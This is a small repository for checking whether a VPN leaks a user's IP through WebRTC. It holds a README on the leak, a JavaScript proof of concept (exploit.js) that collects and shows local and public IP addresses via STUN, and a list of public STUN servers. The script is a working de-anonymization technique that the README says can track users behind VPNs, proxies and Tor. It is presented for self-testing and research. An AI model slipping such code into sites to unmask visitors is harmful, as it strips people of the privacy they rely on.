├── README.md ├── exploit.js └── stunserverlist.txt /README.md: -------------------------------------------------------------------------------- 1 | # WebRTC-Leak 2 | Check whether your VPN leaks your IP address through WebRTC. 3 | 4 | # 23% of tested VPNs leak users' IPs 5 | 6 | ## WebRTC 7 | 8 | Browsers implement WebRTC, which lets a page make requests to STUN servers that return the user's local and public IP addresses. The results of these requests are available to JavaScript, so a page can obtain a user's local and public IP addresses from JavaScript. This demo: https://ip.voidsec.com/ is an example implementation of that. 9 | 10 | Additionally, these STUN requests are made outside of the normal XMLHttpRequest procedure, so they are not visible in the developer console and cannot be blocked by plugins such as AdBlockPlus or Ghostery. This makes these requests usable for online tracking, and for de-anonymizing and tracing users behind common privacy-protection services such as VPNs, SOCKS proxies, HTTP proxies and (in the past) Tor.
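11 | 12 | Read my research on: https://voidsec.com/vpn-leak 13 | -------------------------------------------------------------------------------- /exploit.js: --------------------------------------------------------------------------------
/**
 * Discover the IP addresses this browser exposes through WebRTC ICE
 * candidate gathering and report each distinct address exactly once.
 *
 * The peer connection is configured with a public STUN server, so the
 * gathered candidates carry the host (local) addresses and, when the STUN
 * round trip succeeds, the server-reflexive (public) address. No user
 * permission is involved, which is why a VPN or proxy setup that does not
 * also cover the browser's ICE/UDP traffic shows up as a leak here.
 * Browsers configured to disable WebRTC or to restrict ICE candidates
 * report fewer or no addresses.
 *
 * @param {function(string): void} onNewIP - Invoked once per distinct address found.
 * @throws {Error} If the browser exposes no RTCPeerConnection implementation.
 */
function findIP(onNewIP) {
  var PeerConnection = window.RTCPeerConnection ||
    window.mozRTCPeerConnection ||
    window.webkitRTCPeerConnection;
  if (!PeerConnection) {
    throw new Error('WebRTC is not available: no RTCPeerConnection constructor found');
  }

  var pc = new PeerConnection({ iceServers: [{ urls: 'stun:stun.l.google.com:19302' }] });
  var noop = function () {};
  // Addresses already reported; prototype-less so no key can collide
  // with Object.prototype members.
  var seen = Object.create(null);
  // Dotted IPv4, or a fully expanded (8-group, uncompressed) IPv6 address.
  // Compressed IPv6 forms ("::") are not matched by this pattern.
  var ipRegex = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/g;

  // Report every address contained in `text`, each distinct one only once.
  // String#match returns null when the text holds no address (for example a
  // candidate that carries an mDNS ".local" name instead of a host IP), so
  // the result is guarded before iterating.
  function reportAddresses(text) {
    var found = text.match(ipRegex);
    if (!found) return;
    found.forEach(function (ip) {
      if (!seen[ip]) onNewIP(ip);
      seen[ip] = true;
    });
  }

  // Creating a data channel is enough to make the browser gather ICE candidates.
  pc.createDataChannel('');

  // Candidates already embedded in the offer SDP are scanned line by line;
  // the rest arrive asynchronously through onicecandidate below.
  pc.createOffer(function (sdp) {
    sdp.sdp.split('\n').forEach(function (line) {
      if (line.indexOf('candidate') < 0) return;
      reportAddresses(line);
    });
    pc.setLocalDescription(sdp, noop, noop);
  }, noop);

  pc.onicecandidate = function (ice) {
    if (!ice || !ice.candidate || !ice.candidate.candidate) return;
    reportAddresses(ice.candidate.candidate);
  };
}

// Output list appended to the page; each discovered address becomes one item.
var ul = document.createElement('ul');
ul.textContent = 'Your IPs are: ';
document.body.appendChild(ul);

/**
 * Log one discovered address and append it to the on-page list.
 * textContent (not innerHTML) is used so candidate text is never
 * interpreted as markup.
 *
 * @param {string} ip - Address reported by findIP.
 */
function addIP(ip) {
  console.log('got ip: ', ip);
  var li = document.createElement('li');
  li.textContent = ip;
  ul.appendChild(li);
}

findIP(addIP);
-------------------------------------------------------------------------------- /stunserverlist.txt: -------------------------------------------------------------------------------- 1 | 23.21.150.121:3478 2 | iphone-stun.strato-iphone.de:3478 3 | numb.viagenie.ca:3478 4 | s1.taraba.net:3478 5 | s2.taraba.net:3478 6 | stun.12connect.com:3478 7 | stun.12voip.com:3478 8 | stun.1und1.de:3478 9 | stun.2talk.co.nz:3478 10 |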
stun.2talk.com:3478 11 | stun.3clogic.com:3478 12 | stun.3cx.com:3478 13 | stun.a-mm.tv:3478 14 | stun.aa.net.uk:3478 15 | stun.acrobits.cz:3478 16 | stun.actionvoip.com:3478 17 | stun.advfn.com:3478 18 | stun.aeta-audio.com:3478 19 | stun.aeta.com:3478 20 | stun.alltel.com.au:3478 21 | stun.altar.com.pl:3478 22 | stun.annatel.net:3478 23 | stun.antisip.com:3478 24 | stun.arbuz.ru:3478 25 | stun.avigora.com:3478 26 | stun.avigora.fr:3478 27 | stun.awa-shima.com:3478 28 | stun.awt.be:3478 29 | stun.b2b2c.ca:3478 30 | stun.bahnhof.net:3478 31 | stun.barracuda.com:3478 32 | stun.bluesip.net:3478 33 | stun.bmwgs.cz:3478 34 | stun.botonakis.com:3478 35 | stun.budgetphone.nl:3478 36 | stun.budgetsip.com:3478 37 | stun.cablenet-as.net:3478 38 | stun.callromania.ro:3478 39 | stun.callwithus.com:3478 40 | stun.cbsys.net:3478 41 | stun.chathelp.ru:3478 42 | stun.cheapvoip.com:3478 43 | stun.ciktel.com:3478 44 | stun.cloopen.com:3478 45 | stun.colouredlines.com.au:3478 46 | stun.comfi.com:3478 47 | stun.commpeak.com:3478 48 | stun.comtube.com:3478 49 | stun.comtube.ru:3478 50 | stun.cope.es:3478 51 | stun.counterpath.com:3478 52 | stun.counterpath.net:3478 53 | stun.cryptonit.net:3478 54 | stun.darioflaccovio.it:3478 55 | stun.datamanagement.it:3478 56 | stun.dcalling.de:3478 57 | stun.decanet.fr:3478 58 | stun.demos.ru:3478 59 | stun.develz.org:3478 60 | stun.dingaling.ca:3478 61 | stun.doublerobotics.com:3478 62 | stun.drogon.net:3478 63 | stun.duocom.es:3478 64 | stun.dus.net:3478 65 | stun.e-fon.ch:3478 66 | stun.easybell.de:3478 67 | stun.easycall.pl:3478 68 | stun.easyvoip.com:3478 69 | stun.efficace-factory.com:3478 70 | stun.einsundeins.com:3478 71 | stun.einsundeins.de:3478 72 | stun.ekiga.net:3478 73 | stun.epygi.com:3478 74 | stun.etoilediese.fr:3478 75 | stun.eyeball.com:3478 76 | stun.faktortel.com.au:3478 77 | stun.freecall.com:3478 78 | stun.freeswitch.org:3478 79 | stun.freevoipdeal.com:3478 80 | stun.fuzemeeting.com:3478 81 | stun.gmx.de:3478 82 | 
stun.gmx.net:3478 83 | stun.gradwell.com:3478 84 | stun.halonet.pl:3478 85 | stun.hellonanu.com:3478 86 | stun.hoiio.com:3478 87 | stun.hosteurope.de:3478 88 | stun.ideasip.com:3478 89 | stun.imesh.com:3478 90 | stun.infra.net:3478 91 | stun.internetcalls.com:3478 92 | stun.intervoip.com:3478 93 | stun.ipcomms.net:3478 94 | stun.ipfire.org:3478 95 | stun.ippi.fr:3478 96 | stun.ipshka.com:3478 97 | stun.iptel.org:3478 98 | stun.irian.at:3478 99 | stun.it1.hr:3478 100 | stun.ivao.aero:3478 101 | stun.jappix.com:3478 102 | stun.jumblo.com:3478 103 | stun.justvoip.com:3478 104 | stun.kanet.ru:3478 105 | stun.kiwilink.co.nz:3478 106 | stun.kundenserver.de:3478 107 | stun.l.google.com:19302 108 | stun.linea7.net:3478 109 | stun.linphone.org:3478 110 | stun.liveo.fr:3478 111 | stun.lowratevoip.com:3478 112 | stun.lugosoft.com:3478 113 | stun.lundimatin.fr:3478 114 | stun.magnet.ie:3478 115 | stun.manle.com:3478 116 | stun.mgn.ru:3478 117 | stun.mit.de:3478 118 | stun.mitake.com.tw:3478 119 | stun.miwifi.com:3478 120 | stun.modulus.gr:3478 121 | stun.mozcom.com:3478 122 | stun.myvoiptraffic.com:3478 123 | stun.mywatson.it:3478 124 | stun.nas.net:3478 125 | stun.neotel.co.za:3478 126 | stun.netappel.com:3478 127 | stun.netappel.fr:3478 128 | stun.netgsm.com.tr:3478 129 | stun.nfon.net:3478 130 | stun.noblogs.org:3478 131 | stun.noc.ams-ix.net:3478 132 | stun.node4.co.uk:3478 133 | stun.nonoh.net:3478 134 | stun.nottingham.ac.uk:3478 135 | stun.nova.is:3478 136 | stun.nventure.com:3478 137 | stun.on.net.mk:3478 138 | stun.ooma.com:3478 139 | stun.ooonet.ru:3478 140 | stun.oriontelekom.rs:3478 141 | stun.outland-net.de:3478 142 | stun.ozekiphone.com:3478 143 | stun.patlive.com:3478 144 | stun.personal-voip.de:3478 145 | stun.petcube.com:3478 146 | stun.phone.com:3478 147 | stun.phoneserve.com:3478 148 | stun.pjsip.org:3478 149 | stun.poivy.com:3478 150 | stun.powerpbx.org:3478 151 | stun.powervoip.com:3478 152 | stun.ppdi.com:3478 153 | stun.prizee.com:3478 154 | 
stun.qq.com:3478 155 | stun.qvod.com:3478 156 | stun.rackco.com:3478 157 | stun.rapidnet.de:3478 158 | stun.rb-net.com:3478 159 | stun.refint.net:3478 160 | stun.remote-learner.net:3478 161 | stun.rixtelecom.se:3478 162 | stun.rockenstein.de:3478 163 | stun.rolmail.net:3478 164 | stun.rounds.com:3478 165 | stun.rynga.com:3478 166 | stun.samsungsmartcam.com:3478 167 | stun.schlund.de:3478 168 | stun.services.mozilla.com:3478 169 | stun.sigmavoip.com:3478 170 | stun.sip.us:3478 171 | stun.sipdiscount.com:3478 172 | stun.sipgate.net:10000 173 | stun.sipgate.net:3478 174 | stun.siplogin.de:3478 175 | stun.sipnet.net:3478 176 | stun.sipnet.ru:3478 177 | stun.siportal.it:3478 178 | stun.sippeer.dk:3478 179 | stun.siptraffic.com:3478 180 | stun.skylink.ru:3478 181 | stun.sma.de:3478 182 | stun.smartvoip.com:3478 183 | stun.smsdiscount.com:3478 184 | stun.snafu.de:3478 185 | stun.softjoys.com:3478 186 | stun.solcon.nl:3478 187 | stun.solnet.ch:3478 188 | stun.sonetel.com:3478 189 | stun.sonetel.net:3478 190 | stun.sovtest.ru:3478 191 | stun.speedy.com.ar:3478 192 | stun.spokn.com:3478 193 | stun.srce.hr:3478 194 | stun.ssl7.net:3478 195 | stun.stunprotocol.org:3478 196 | stun.symform.com:3478 197 | stun.symplicity.com:3478 198 | stun.sysadminman.net:3478 199 | stun.t-online.de:3478 200 | stun.tagan.ru:3478 201 | stun.tatneft.ru:3478 202 | stun.teachercreated.com:3478 203 | stun.tel.lu:3478 204 | stun.telbo.com:3478 205 | stun.telefacil.com:3478 206 | stun.tis-dialog.ru:3478 207 | stun.tng.de:3478 208 | stun.twt.it:3478 209 | stun.u-blox.com:3478 210 | stun.ucallweconn.net:3478 211 | stun.ucsb.edu:3478 212 | stun.ucw.cz:3478 213 | stun.uls.co.za:3478 214 | stun.unseen.is:3478 215 | stun.usfamily.net:3478 216 | stun.veoh.com:3478 217 | stun.vidyo.com:3478 218 | stun.vipgroup.net:3478 219 | stun.virtual-call.com:3478 220 | stun.viva.gr:3478 221 | stun.vivox.com:3478 222 | stun.vline.com:3478 223 | stun.vo.lu:3478 224 | stun.vodafone.ro:3478 225 | stun.voicetrading.com:3478 
226 | stun.voip.aebc.com:3478 227 | stun.voip.blackberry.com:3478 228 | stun.voip.eutelia.it:3478 229 | stun.voiparound.com:3478 230 | stun.voipblast.com:3478 231 | stun.voipbuster.com:3478 232 | stun.voipbusterpro.com:3478 233 | stun.voipcheap.co.uk:3478 234 | stun.voipcheap.com:3478 235 | stun.voipfibre.com:3478 236 | stun.voipgain.com:3478 237 | stun.voipgate.com:3478 238 | stun.voipinfocenter.com:3478 239 | stun.voipplanet.nl:3478 240 | stun.voippro.com:3478 241 | stun.voipraider.com:3478 242 | stun.voipstunt.com:3478 243 | stun.voipwise.com:3478 244 | stun.voipzoom.com:3478 245 | stun.vopium.com:3478 246 | stun.voxgratia.org:3478 247 | stun.voxox.com:3478 248 | stun.voys.nl:3478 249 | stun.voztele.com:3478 250 | stun.vyke.com:3478 251 | stun.webcalldirect.com:3478 252 | stun.whoi.edu:3478 253 | stun.wifirst.net:3478 254 | stun.wwdl.net:3478 255 | stun.xs4all.nl:3478 256 | stun.xtratelecom.es:3478 257 | stun.yesss.at:3478 258 | stun.zadarma.com:3478 259 | stun.zadv.com:3478 260 | stun.zoiper.com:3478 261 | stun1.faktortel.com.au:3478 262 | stun1.l.google.com:19302 263 | stun1.voiceeclipse.net:3478 264 | stun2.l.google.com:19302 265 | stun3.l.google.com:19302 266 | stun4.l.google.com:19302 267 | stunserver.org:3478 268 | --------------------------------------------------------------------------------